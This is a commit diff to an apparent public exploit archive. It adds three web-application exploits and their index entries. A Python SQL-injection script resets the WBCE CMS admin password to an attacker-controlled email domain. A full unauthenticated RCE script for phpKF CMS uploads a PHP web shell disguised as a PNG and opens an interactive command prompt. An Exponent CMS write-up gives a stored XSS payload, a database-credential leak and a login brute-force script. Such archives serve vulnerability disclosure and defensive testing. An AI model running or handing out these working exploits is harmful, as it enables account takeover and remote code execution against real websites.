DB: 2021-12-21

3 changes to exploits/shellcodes WBCE CMS 1.5.1 - Admin Password Reset phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated) Exponent CMS 2.6 - Multiple Vulnerabilities
2021-12-21 05:01:55 +00:00 · 2021-12-21 05:01:55 +00:00 · 00cc9f489e
commit 00cc9f489e
parent b9164fdd7e
4 changed files with 382 additions and 0 deletions
--- a/exploits/php/webapps/50609.py
+++ b/exploits/php/webapps/50609.py
@ -0,0 +1,31 @@
 # Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
 # Google Dork: intext: "Way Better Content Editing"
 # Date: 20/12/2021
 # Exploit Author: citril or https://github.com/maxway2021
 # Vendor Homepage: https://wbce.org/
 # Software Link: https://wbce.org/de/downloads/
 # Version: <= 1.5.1
 # Tested on: Linux
 # CVE : CVE-2021-3817
 # Github repo: https://github.com/WBCE/WBCE_CMS
 # Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75
 import requests
 _url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
 _domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
 headers = {
    'User-Agent': 'Mozilla/5.0',
    'Accept':
 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
 }
 _p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"
 r = requests.post(url = _url, headers = headers, data = _p)
 if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
--- a/exploits/php/webapps/50610.py
+++ b/exploits/php/webapps/50610.py
@ -0,0 +1,244 @@
 # Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
 # Date: 18/12/2021
 # Exploit Author: Halit AKAYDIN (hLtAkydn)
 # Vendor Homepage: https://www.phpkf.com/
 # Software Link: https://www.phpkf.com/indirme.php
 # Version: 3.00
 # Category: Webapps
 # Tested on: Linux/Windows
 # phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more.
 # Contains an endpoint that allows remote access
 # Necessary checks are not made in the file upload mechanism, only the file extension is checked
 # The file with the extension ".png" can be uploaded and the extension can be changed.
 # Example: python3 exploit.py -u http://example.com
 #		   python3 exploit.py -u http://example.com -l admin -p Admin123
 from bs4 import BeautifulSoup
 from time import sleep
 import requests
 import argparse
 import json
 def main():
 	parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)')
 	parser.add_argument('-u', '--host', type=str, required=True)
 	parser.add_argument('-l', '--login', type=str, required=False)
 	parser.add_argument('-p', '--password', type=str, required=False)
 	args = parser.parse_args()
 	print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)",
 		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
 	host(args)
 def host(args):
 	#Check http or https
 	if args.host.startswith(('http://', 'https://')):
 		print("[?] Check Url...\n")
 		sleep(2)
 		args.host = args.host
 		if args.host.endswith('/'):
 			args.host = args.host[:-1]
 		else:
 			pass
 	else:
 		print("\n[?] Check Adress...\n")
 		sleep(2)
 		args.host = "http://" + args.host
 		args.host = args.host
 		if args.host.endswith('/'):
 			args.host = args.host[:-1]
 		else:
 			pass
 	# Check Host Status
 	try:
 		response = requests.get(args.host)
 		if response.status_code == 200:
 			if args.login == None and args.password == None:
 				create_user(args)
 			else:
 				login_user(args)
 		else:
 			print("[-] Address not reachable!")
 			sleep(2)
 	except requests.ConnectionError as exception:
 		print("[-] Address not reachable!")
 		sleep(2)
 		exit(1)
 def create_user(args):
 	print("[*] Create User!\n")
 	sleep(2)
 	url = args.host + "/phpkf-bilesenler/kayit_yap.php"
 	headers = {
 			"Origin": args.host,
 			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
 			"Referer": "http://fuzzing.com/uye-kayit.php",
 			"Accept-Encoding": "gzip, deflate"
 	}
 	data = {
 			"kayit_yapildi_mi": "form_dolu",
 			"oturum": '', "kullanici_adi": "evil",
 			"sifre": "Evil123",
 			"sifre2": "Evil123",
 			"posta": "evil@localhost.com",
 			"kosul": "on"
 	}
 	response = requests.post(url, headers=headers, data=data, allow_redirects=True)
 	args.login = ("evil")
 	args.password = ("Evil123")
 	print("[+] " + args.login + ":" + args.password + "\n")
 	sleep(2)
 	login_user(args)
 def login_user(args):
 	url = args.host + "/uye-giris.php"
 	headers = {
 			"Origin": args.host,
 			"Content-Type": "application/x-www-form-urlencoded",
 			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
 			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
 			"Referer": args.host + "/uye-giris.php",
 			"Accept-Encoding": "gzip, deflate"
 	}
 	data = {
 			"kayit_yapildi_mi": "form_dolu",
 			"git": args.host + "/index.php",
 			"kullanici_adi": args.login,
 			"sifre": args.password,
 			"hatirla": "on"
 	}
 	response = requests.post(url, headers=headers, data=data, allow_redirects=False)
 	token = response.cookies.get("kullanici_kimlik")
 	if (token != None):
 		print("[!] Login Success!\n")
 		sleep(2)
 		upload_evil(args, token)
 	else:
 		if args.login == "evil" and args.password == "Evil123":
 			print("[!] Unauthorized user!\n")
 			print("[!] manually add a user and try again\n")
 			print("[!] Go to link " + args.host + "/uye-kayit.php\n")
 			print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'")
 			sleep(2)
 		else:
 			print("[!] Unauthorized user!\n")
 			sleep(2)
 def upload_evil(args, token):
 	url = args.host + "/phpkf-bilesenler/yukleme/index.php"
 	cookies = {
 			"kullanici_kimlik": token,
 			"dil": "en"
 	}
 	headers = {
 			"VERICEK": "",
 			"DOSYA-ADI": "evil.png",
 			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
 			"Content-type": "application/x-www-form-urlencoded; charset=utf-8",
 			"Accept": "*/*",
 			"Origin": args.host,
 			"Referer": args.host + "/oi_yaz.php",
 			"Accept-Encoding": "gzip, deflate"
 	}
 	data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>"
 	response = requests.post(url, headers=headers, cookies=cookies, data=data)
 	if (response.text == "yuklendi"):
 		print("[!] Upload Success!\n")
 		sleep(2)
 		change_name(args, token)
 	else:
 		print("[!] Upload Failed!\n")
 		sleep(2)
 def change_name(args, token):
 	url = args.host + "/phpkf-bilesenler/yukleme/index.php"
 	cookies = {
 			"kullanici_kimlik": token,
 			"dil": "en"
 	}
 	headers = {
 			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
 			"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
 			"Accept": "*/*",
 			"Origin": args.host,
 			"Referer": args.host + "/oi_yaz.php",
 			"Accept-Encoding": "gzip, deflate"
 	}
 	data = {
 			"yenidenadlandir": "evil.png|evil.php",
 			"vericek": "/"
 	}
 	response = requests.post(url, headers=headers, cookies=cookies, data=data)
 	if (response.text == "Name successfully changed..."):
 		print("[!] Change Name evil.php!\n")
 		sleep(2)
 		find_dict(args, token)
 	else:
 		print("[!] Change Failed!\n")
 		sleep(2)
 def find_dict(args, token):
 	url = args.host + "/phpkf-bilesenler/yukleme/index.php"
 	cookies = {
 			"kullanici_kimlik": token,
 			"dil": "en"
 	}
 	headers = {
 			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
 			"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
 			"Accept": "*/*",
 			"Origin": args.host,
 			"Referer": args.host + "/oi_yaz.php",
 			"Accept-Encoding": "gzip, deflate"
 	}
 	data = {
 			"vericek": "/",
 			"dds": "0"
 	}
 	response = requests.post(url, headers=headers, cookies=cookies, data=data)
 	if (response.text == "You can not upload files!"):
 		print("[!] File not found!\n")
 		sleep(2)
 	else:
 		print("[!] Find Vuln File!\n")
 		sleep(2)
 		soup = BeautifulSoup(response.text, 'html.parser')
 		path = soup.find("div").contents[1].replace(" ", "")
 		exploit(args, path)
 def exploit(args, path):
 	print("[+] Exploit Done!\n")
 	sleep(2)
 	while True:
 		cmd = input("$ ")
 		url = args.host + path + "evil.php?cmd=" + cmd
 		headers = {
 			"Upgrade-Insecure-Requests": "1",
 			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
 		}
 		response = requests.post(url, headers=headers, timeout=5)
 		if response.text == "":
 			print(cmd + ": command not found\n")
 		else:
 			print(response.text)
 if __name__ == '__main__':
 	main()
--- a/exploits/php/webapps/50611.txt
+++ b/exploits/php/webapps/50611.txt
@ -0,0 +1,104 @@
 # Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
 # Exploit Author: heinjame
 # Date: 22/10/2021
 # Exploit Author: picaro_o
 # Vendor Homepage: https://www.exponentcms.org/
 # Version: <=2.6
 # Tested on: Linux os
 *Stored XSS*
 Affected parameter = >
 http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,
 Text Block)
 Payload = <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
 ** *Database credential are disclosed in response ***
 POC
 ```
 var adminerwindow = function (){
             var win =
 window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
             if (!win) { err(); }
         }
 ```
 **Authentication Bruteforce*
 ```
 import argparse
 import requests
 import sys
 parser = argparse.ArgumentParser()
 parser.add_argument("url", help="URL")
 parser.add_argument("Username list", help="Username List")
 parser.add_argument("Password list", help="Password List")
 pargs = parser.parse_args()
 host = sys.argv[1]
 userlist = sys.argv[2]
 passlist = sys.argv[3]
 try:
    readuser = open(userlist)
    readpass = open(passlist)
 except:
    print("Unable to load files")
    exit()
 def usernamebrute():
    s = requests.Session()
    for username in readuser.readlines():
        brute={
                'controller':(None,'users'),
                'src':(None,''),
                'int':(None,''),
                'action':(None,'send_new_password'),
                'username':(None,username.strip()),
        }
        bruteforce = s.post(host+"/index.php",files=brute)
        status = s.get(host+"/users/reset_password")
        if "administrator" in status.text:
            print("[+] Found username : "+ username)
            adminaccount = username
            checkpoint = True
            return adminaccount,checkpoint
            break
 def passwordbrute(adminaccount):
    s = requests.Session()
    s.cookies.set("csrftoken", "abc")
    header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0)
 Gecko/20100101 Firefox/78.0',
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Accept-Encoding': 'gzip, deflate',
 'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
 'Referer': host+'/login/showlogin'
    }
    for password in readpass.readlines():
        brute={
                'controller':'login',
                'src':'',
                'int':'',
                'action':'login',
                'username':adminaccount,
                'password':password.strip()
        }
        bruteforce = s.post(host+"/index.php",headers=header,data=brute)
        # print(bruteforce.text)
        status = s.get(host+"/login/showlogin",cookies=csrf)
        print(status.text)
        if "Invalid Username / Password" not in status.text:
            print("[+] Found Password : "+ password)
            break
 adminaccount,checkpoint = usernamebrute()
 if checkpoint == True:
    passwordbrute(adminaccount)
 else:
    print("Can't find username,We can't proceed sorry :(")
 ```
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44688,3 +44688,6 @@ id,file,description,date,author,type,platform,port
 50602,exploits/php/webapps/50602.txt,"Croogo 3.0.2 - Unrestricted File Upload",1970-01-01,"Enes Özeser",webapps,php,
 50603,exploits/php/webapps/50603.txt,"Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Enes Özeser",webapps,php,
 50608,exploits/php/webapps/50608.html,"Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,=(L_L)=,webapps,php,
 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",1970-01-01,citril,webapps,php,
 50610,exploits/php/webapps/50610.py,"phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
 50611,exploits/php/webapps/50611.txt,"Exponent CMS 2.6 - Multiple Vulnerabilities",1970-01-01,heinjame,webapps,php,